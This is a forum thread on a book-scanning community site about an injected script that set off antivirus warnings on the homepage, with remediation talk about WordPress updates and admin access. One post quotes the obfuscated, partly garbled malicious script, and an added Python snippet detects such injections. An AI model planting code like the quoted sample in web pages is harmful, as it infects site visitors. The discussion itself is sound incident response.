Virus on Homepage ?

Just what it says.

Moderator: peterZ

Hasher
Posts: 77
Joined: 26 Sep 2009, 03:05

Virus on Homepage ?

Post by Hasher »

Am I the only one getting a virus warning on http://diybookscanner.org/ homepage ?


daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States

Re: Virus on Homepage ?

Post by daniel_reetz »

Hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>


I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.
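
Added example (not part of the original post, and not code from the site's maintainers): a heuristic check for the pattern quoted above, an inline script sitting directly before `</body>` whose assignments are almost all throwaway two-letter names. The function names, thresholds and sample pages are assumptions constructed for illustration; minified legitimate scripts can also trip it, so findings need review against a known-good copy of the page.

```python
import re

# Inline <script> blocks; group 1 = attributes, group 2 = script body.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
# Assignment targets such as `var bO=`, `this.vX=`, `jJ=` (comparisons excluded).
ASSIGN_RE = re.compile(
    r"(?:\bvar\s+|\bthis\.|(?<![\w.$]))([A-Za-z_$][\w$]*)\s*=(?!=)")

def junk_score(js):
    """Return (short_names, total_names) over assignment targets in js."""
    names = ASSIGN_RE.findall(js)
    return sum(len(n) <= 3 for n in names), len(names)

def suspicious_scripts(html, min_short=8, min_ratio=0.8):
    """Return [(offset, position, short, total)] for inline scripts whose
    assignments are dominated by throwaway 1-3 character names."""
    findings = []
    body_end = html.lower().rfind("</body")
    for m in SCRIPT_RE.finditer(html):
        attrs, js = m.group(1), m.group(2)
        if re.search(r"\bsrc\s*=", attrs, re.I) or not js.strip():
            continue  # external or empty script: nothing inline to score
        short, total = junk_score(js)
        if total == 0 or short < min_short or short / total < min_ratio:
            continue
        # "trailing" = only whitespace between this script and </body>
        trailing = (body_end != -1 and m.end() <= body_end
                    and not html[m.end():body_end].strip())
        findings.append((m.start(), "trailing" if trailing else "inline",
                         short, total))
    return findings

# Constructed samples (harmless): padding-style assignments vs. ordinary page code.
SAMPLE_INFECTED = (
    "<html><body><p>Welcome</p>"
    "<script>var aB=1;var cD='';this.eF='';gH=false;var iJ=2;"
    "var kL=[];mN='';var oP=3;this.qR=0;</script>"
    "</body></html>")
SAMPLE_CLEAN = (
    "<html><body><script src='/js/scriptaculous.js'></script>"
    "<script>var galleryIndex = 0; var captionText = 'page';</script>"
    "</body></html>")

if __name__ == "__main__":
    for name, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, suspicious_scripts(page))
```

Run over every HTML and template file in the web root, a "trailing" finding in a file that has not been deliberately edited is the cue to compare it with a backup.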

Re: Virus on Homepage ?

Post by daniel_reetz »

Apparently WordPress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/

Re: Virus on Homepage ?

Post by daniel_reetz »

It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.
Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 »

You're also a bit behind on WordPress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with phpBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? WordPress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about phpBB3...

Re: Virus on Homepage ?

Post by daniel_reetz »

Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for WordPress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.
Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 »

I wouldn't rely too much on a hosting panel for this. WordPress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of WordPress and PHP-based system infections being spread via Dreamhost specifically. I hope this isn't one of them...

Re: Virus on Homepage ?

Post by daniel_reetz »

Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates; I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.
rob
Posts: 773
Joined: 03 Jun 2009, 13:50
E-book readers owned: iRex iLiad, Kindle 2
Number of books owned: 4000
Country: United States
Location: Maryland, United States

Re: Virus on Homepage ?

Post by rob »

The Admin Control Panel for the forum has an upgrade button; it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.
The Singularity is Near. ~ http://halfbakedmaker.org ~ Follow me as I build the world's first all-mechanical steam-powered computer.